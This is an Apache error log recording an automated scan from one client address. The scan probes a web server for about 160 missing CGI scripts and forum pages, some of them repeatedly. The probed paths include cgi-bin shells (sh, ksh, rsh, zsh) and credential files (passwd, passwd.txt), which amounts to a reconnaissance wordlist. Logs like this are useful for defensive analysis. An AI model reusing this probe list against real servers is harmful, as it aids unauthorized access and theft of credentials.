[Wed Sep 29 21:38:08.713399 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/ftp.pl
[Wed Sep 29 21:38:08.838199 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/ftpsh
[Wed Sep 29 21:38:08.947400 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/getdoc.cgi
[Wed Sep 29 21:38:09.072200 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/glimpse
[Wed Sep 29 21:38:09.197000 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/hitview.cgi
[Wed Sep 29 21:38:09.306200 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/jailshell
[Wed Sep 29 21:38:09.415400 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/jj
[Wed Sep 29 21:38:09.524601 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/ksh
[Wed Sep 29 21:38:09.649401 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/log-reader.cgi
[Wed Sep 29 21:38:09.758601 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/log
[Wed Sep 29 21:38:09.867801 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/login.cgi
[Wed Sep 29 21:38:09.977001 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/login.pl
[Wed Sep 29 21:38:10.086202 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/logit.cgi
[Wed Sep 29 21:38:10.226602 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/logs.pl
[Wed Sep 29 21:38:10.335802 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/logs
[Wed Sep 29 21:38:10.445002 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/logs
[Wed Sep 29 21:38:10.554202 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/logs
[Wed Sep 29 21:38:10.663403 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/lookwho.cgi
[Wed Sep 29 21:38:10.772603 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/maillist.cgi
[Wed Sep 29 21:38:10.881803 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/maillist.pl
[Wed Sep 29 21:38:10.991003 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/man.sh
[Wed Sep 29 21:38:11.115803 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/meta.pl
[Wed Sep 29 21:38:11.225004 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/minimal.exe
[Wed Sep 29 21:38:11.334204 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/nlog-smb.cgi
[Wed Sep 29 21:38:11.459004 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/nlog-smb.pl
[Wed Sep 29 21:38:11.568204 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/noshell
[Wed Sep 29 21:38:11.677404 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/nph-publish
[Wed Sep 29 21:38:11.802205 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/ntitar.pl
[Wed Sep 29 21:38:11.942605 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/pass
[Wed Sep 29 21:38:12.051805 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/passwd
[Wed Sep 29 21:38:12.176605 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/passwd.txt
[Wed Sep 29 21:38:12.301405 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/password
[Wed Sep 29 21:38:12.410606 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/post_query
[Wed Sep 29 21:38:12.535406 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/pu3.pl
[Wed Sep 29 21:38:12.644606 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/ratlog.cgi
[Wed Sep 29 21:38:12.769406 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/responder.cgi
[Wed Sep 29 21:38:12.878606 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/rguest.exe
[Wed Sep 29 21:38:13.003407 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/rksh
[Wed Sep 29 21:38:13.112607 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/rsh
[Wed Sep 29 21:38:13.221807 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/search.cgi
[Wed Sep 29 21:38:13.331007 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/search.pl
[Wed Sep 29 21:38:13.440207 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/session
[Wed Sep 29 21:38:13.580608 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/sh
[Wed Sep 29 21:38:13.689808 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/show.pl
[Wed Sep 29 21:38:13.814608 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/stat
[Wed Sep 29 21:38:13.923808 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/stats-bin-p
[Wed Sep 29 21:38:14.064209 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/stats.pl
[Wed Sep 29 21:38:14.204609 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/stats.prf
[Wed Sep 29 21:38:14.329409 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/stats
[Wed Sep 29 21:38:14.454209 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/statsconfig
[Wed Sep 29 21:38:14.703810 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/stats_old
[Wed Sep 29 21:38:14.875410 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/statview.pl
[Wed Sep 29 21:38:15.047010 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/survey
[Wed Sep 29 21:38:15.530611 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/survey.cgi
[Wed Sep 29 21:38:15.639811 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/tablebuild.pl
[Wed Sep 29 21:38:15.764612 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/tcsh
[Wed Sep 29 21:38:15.873812 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/test.cgi
[Wed Sep 29 21:38:15.983012 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/test
[Wed Sep 29 21:38:16.092212 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/textcounter.pl
[Wed Sep 29 21:38:16.217012 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/tidfinder.cgi
[Wed Sep 29 21:38:16.326212 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/tigvote.cgi
[Wed Sep 29 21:38:16.435413 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/tpgnrock
[Wed Sep 29 21:38:16.560213 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/ultraboard.cgi
[Wed Sep 29 21:38:16.669413 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/ultraboard.pl
[Wed Sep 29 21:38:16.778613 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/viewlogs.pl
[Wed Sep 29 21:38:16.887813 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/visitor.exe
[Wed Sep 29 21:38:16.997014 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/w3-msql
[Wed Sep 29 21:38:17.106214 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/w3-sql
[Wed Sep 29 21:38:17.231014 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/webais
[Wed Sep 29 21:38:17.340214 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/webbbs.cgi
[Wed Sep 29 21:38:17.465014 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/webbbs.exe
[Wed Sep 29 21:38:17.574215 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/webutil.pl
[Wed Sep 29 21:38:17.683415 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/webutils.pl
[Wed Sep 29 21:38:17.792615 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/webwho.pl
[Wed Sep 29 21:38:17.901815 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/wguest.exe
[Wed Sep 29 21:38:18.011015 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/www-sql
[Wed Sep 29 21:38:18.135816 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/wwwboard.cgi.cgi
[Wed Sep 29 21:38:18.245016 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/wwwboard.pl
[Wed Sep 29 21:38:18.369816 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/wwwstats.pl
[Wed Sep 29 21:38:18.479016 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/wwwthreads
[Wed Sep 29 21:38:18.588216 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/wwwthreads
[Wed Sep 29 21:38:18.697417 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/zsh
[Wed Sep 29 21:38:19.290218 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/localstart.asp
[Wed Sep 29 21:38:23.876626 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/abonnement.asp
[Wed Sep 29 21:38:26.637831 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/archive.asp
[Wed Sep 29 21:38:26.762631 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/archive_forum.asp
[Wed Sep 29 21:38:28.369434 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/boilerplate.asp
[Wed Sep 29 21:38:29.633036 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/communique.asp
[Wed Sep 29 21:38:30.600238 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/CSNews.cgi
[Wed Sep 29 21:38:30.709438 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/csPassword.cgi
[Wed Sep 29 21:38:33.548643 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/emumail.cgi
[Wed Sep 29 21:38:35.280246 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum-ra.asp
[Wed Sep 29 21:38:35.389446 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum-ra.asp
[Wed Sep 29 21:38:35.514246 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum-ra.asp
[Wed Sep 29 21:38:35.623446 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum-ra.asp
[Wed Sep 29 21:38:35.732647 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum-ra.asp
[Wed Sep 29 21:38:35.841847 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum-ra.asp
[Wed Sep 29 21:38:35.966647 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum-ra.asp
[Wed Sep 29 21:38:36.075847 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum-ra.asp
[Wed Sep 29 21:38:36.185047 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum-ra_professionnel.asp
[Wed Sep 29 21:38:36.294248 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum-ra_professionnel.asp
[Wed Sep 29 21:38:36.403448 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum-ra_professionnel.asp
[Wed Sep 29 21:38:36.512648 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum-ra_professionnel.asp
[Wed Sep 29 21:38:36.637448 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum-ra_professionnel.asp
[Wed Sep 29 21:38:36.746648 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum-ra_professionnel.asp
[Wed Sep 29 21:38:36.855849 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum-ra_professionnel.asp
[Wed Sep 29 21:38:36.965049 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum-ra_professionnel.asp
[Wed Sep 29 21:38:37.074249 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum-ra_professionnel.asp
[Wed Sep 29 21:38:37.183449 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum-ra_professionnel.asp
[Wed Sep 29 21:38:37.292649 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum-ra_professionnel.asp
[Wed Sep 29 21:38:37.401850 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum.asp
[Wed Sep 29 21:38:37.526650 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum.asp
[Wed Sep 29 21:38:37.635850 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum.asp
[Wed Sep 29 21:38:37.745050 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum.asp
[Wed Sep 29 21:38:37.854250 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum.asp
[Wed Sep 29 21:38:37.979051 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum.asp
[Wed Sep 29 21:38:38.103851 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum.asp
[Wed Sep 29 21:38:38.213051 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum.asp
[Wed Sep 29 21:38:38.323251 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum.asp
[Wed Sep 29 21:38:38.448051 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum.asp
[Wed Sep 29 21:38:38.557252 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum.asp
[Wed Sep 29 21:38:39.228053 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1.asp
[Wed Sep 29 21:38:39.337253 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1.asp
[Wed Sep 29 21:38:39.462053 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1.asp
[Wed Sep 29 21:38:39.571253 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1.asp
[Wed Sep 29 21:38:39.680454 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1.asp
[Wed Sep 29 21:38:39.805254 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1.asp
[Wed Sep 29 21:38:39.914454 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1.asp
[Wed Sep 29 21:38:40.023654 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1.asp
[Wed Sep 29 21:38:40.148454 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1.asp
[Wed Sep 29 21:38:40.257655 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1.asp
[Wed Sep 29 21:38:40.366855 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1.asp
[Wed Sep 29 21:38:40.476055 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1.asp
[Wed Sep 29 21:38:40.600855 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1.asp
[Wed Sep 29 21:38:40.710055 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1.asp
[Wed Sep 29 21:38:40.819256 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1.asp
[Wed Sep 29 21:38:40.944056 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1.asp
[Wed Sep 29 21:38:41.068856 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1.asp
[Wed Sep 29 21:38:41.193656 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1.asp
[Wed Sep 29 21:38:41.318456 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1.asp
[Wed Sep 29 21:38:41.427657 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1.asp
[Wed Sep 29 21:38:41.552457 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1.asp
[Wed Sep 29 21:38:41.661657 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1.asp
[Wed Sep 29 21:38:41.770857 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1.asp
[Wed Sep 29 21:38:42.004858 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:42.114058 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:42.238858 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:42.348058 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:42.457258 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:42.566459 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:42.675659 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:42.784859 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:42.909659 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:43.018859 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:43.128060 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:43.237260 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:43.362060 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:43.471260 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:43.580460 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:43.705261 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:43.814461 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:43.923661 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:44.032861 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:44.157661 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:44.266862 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:44.376062 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:44.485262 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:45.109263 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:45.218463 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:45.327663 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
